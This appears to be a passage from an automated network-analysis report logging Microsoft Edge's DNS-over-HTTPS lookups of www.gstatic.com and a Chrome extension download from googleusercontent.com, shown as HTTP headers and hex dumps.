                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1d9830f75-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom%#)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    20192.168.2.549828162.159.61.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1e86043bc-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 00 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    21192.168.2.549829162.159.61.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1ee1d17b5-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 00 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    22192.168.2.549834172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1ec2b42c6-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom )


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    23192.168.2.549835172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1e86043b2-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom Hc)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    24192.168.2.549822172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1eb8e42c0-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    25192.168.2.549823142.250.181.654437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Content-Length: 154477
                                                                                                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6peKbeaD5AAOFIFpIY4iRMz0r723tdQqjZ-_sZLw4H2KJ7KzMpVkWBpbUuXqhVSHwrJ2iSn3M
                                                                                                                                                                                                                                                                                    X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                                                                                                    Date: Sun, 22 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Expires: Mon, 22 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    Age: 50382
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                    ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                                    Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                                    Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                                    Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                                    Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
